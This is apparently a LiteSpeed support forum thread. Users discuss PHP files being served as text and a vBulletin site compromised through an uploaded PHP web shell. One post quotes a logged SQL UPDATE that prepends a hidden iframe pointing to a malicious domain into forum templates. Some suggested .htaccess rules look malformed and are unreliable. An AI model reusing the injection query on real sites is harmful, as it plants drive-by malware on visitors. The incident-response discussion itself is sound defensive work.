Urgent security issue - php files are downloaded as text

LiteSpeeder

For the last few weeks i've re-uploaded some of my php files several times to fix this problem. When a php file is requested too many times the server stops processing it as php and downloads/displays as text. Please respond asap.

PSS

Should be addressed in our 4.0.11 release soon.
Thanks. I did report one other cause for this (configuration notice). I hope you ensure that in no circumstances PHP files are displayed as text, unless .php MIME type is changed (i.e. someone want specifically to display php as text).

MikeDVB

When I saw this happen it was sending the output of the PHP file (and not the actual source) as a down-loadable file which wouldn't be a security issue but a nuisance. That is unless my memory is failing me!

Can you verify that it is actually sending the *source* of the file and not just the output?

MikeDVB

I guess I could understand how the two are related, once the server runs out of available processors for PHP it doesn't process it and just sends the contents of the file as though it were HTML...

At any rate, realistically LSWS should have some sort of warning about this or in some way prevent it as it is a huge security issue especially if somebody goes to your config.php and holds down F5 on a few machines, they're bound to get the "download config.php" eventually.

mistwang

LiteSpeed Staff
All packages for 4.0.11 has been uploaded, any one interested in helping us testing the new release, you can download by changing the version number in the download link to 4.0.11. Will update the the download page after get some positive feedbacks.

LiteSpeeder

I've been suffering from an iframe attack for 10 days. My site is a mainly vBulletin site and a few addons. This is not a typical iframe injection to php files and i've already followed every iframe cleaning, iframe protection related suggestions (including formatting my pc, scanning my servers, changing password and restoring backups)

I've also disabled custom addons-script. But somehow, the hacker (or it may still be a virus) can add iframes to my templates.

The iframe is being injected via sql queries. Sample code from my mysql logs:

Code:
16905 Query       UPDATE template SET template=concat('<iframe width=1 height=1 border=0 frameborder=0 src=\\"evil_domain\\"></iframe>', template), template_un=concat('<iframe width=1 height=1 border=0 frameborder=0 src=\\"evil_domain\\"></iframe>', template_un) where title='header'
Now another big forum site is infected, too. I'm not alone. AND YES, THEY ARE USING LITESPEED like me!

This is the only way i can slowdown or stop the hacker-virus for a while:
-I remove the old database user from my database.
-I create a new database user.
-I edit my config.php and upload to server.

This way it doesn't add iframe to my header template for a few hours.. but then the same thing happens :(

Here's my theory: They can view my config.php as text and retrieve my database password from there.

There are no traces in access logs or there are none edited/updated php files. I guess they're simply having database access as i told above and they can easily execute queries.

Please help ASAP! :(

LiteSpeeder

Another issue with litespeed:

.htaccess in my includes folder:
Code:
<Files config.php>
order deny,allow
deny from all
</Files>
HTTP Status Code: HTTP/1.0 403 Forbidden with APACHE
HTTP Status Code: HTTP/1.0 200 OK with LITESPEED

Now i've switched to Apache to be sure the vulnerability is lsws.

mistwang

LiteSpeed Staff
Maybe the hacker uploaded a PHP shell, which allows the hacker to access any PHP code.
It is hard to say, but, looks like it is PHP code related issue. Have you upgrade vB to the latest release?
Yeah, please keep us updated on this issue.

PSS

Here's my theory: They can view my config.php as text and retrieve my database password from there.

There are no traces in access logs or there are none edited/updated php files. I guess they're simply having database access as i told above and they can easily execute queries.

Please help ASAP! :(
Is you mysql server remote or local? If local, add

skip-networking

to my.cnf's [mysqld] section.

Use phpmyadmin to check forum mysql user privileges, make sure that they can only access from localhost, and with password.

Change your vbulletin admin folder name.

Shut down ssh.

Rename wget.

Add that malicious domain name to LSWS to THE_REQUEST/POST_PAYLOAD Request Filtering Rules.

To make template database (FORUM_template) read-only, see http://www.linuxtopia.org/online_bo..._5.1_database_reference_guide/myisampack.html

You do not give any info what kind of system you run, is it shared/VPS or dedicated server, if you use Ensim, Cpanel or not, if you have NFS or other remote access to other servers etc. Building a secure system is not simple, but the keyword is "simplify".

I run Litespeed and a very large forum. I have SSH and FTP closed, I use private network, VPN and SSH2 (opened only for that 10 seconds when I log in) for communication with servers, my CP is Webmin, I use no vbulletin plugins or mods and database is only accessible from localhost. Simple and effective, fast, secure so far :)

Last edited:

LiteSpeeder

Yes, you were right!

They uploaded a PHP shell to my /forum/customprofilepics/ (chmod 777) as profilepic632436_2.php (12 days ago!!)

Can you please tell me how to stop these shells to be uploaded and even they are uploaded, restricting their functions?

I've uploaded the shell.

Attachments

Last edited:

mistwang

LiteSpeed Staff
Just strengthen the file/directory permission of your web site, the hacker is likely used a security hole in PHP to upload the script, PHP is running as the global user or site owner (SuEXEC) mode, so, make majority of your site owned by "root" and only writable by root will stop it.

LiteSpeeder

Unfortunately some vbulletin directories (customavatars, customprofilepics) should be chmod 777. So i put htaccess files there including the lines below:
Code:
Options -Indexes
Options -ExecCGI
AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .html .shtml .sh .cgi 
<Files ^(*.jpeg|*.jpg|*.png|*.gif)>
order deny,allow
deny from all
</Files>
But i'm not sure if litespeed support these kind of .htaccess rules. How can i test this?

And please reply my other post, too http://www.litespeedtech.com/support/forum/showpost.php?p=17442&postcount=14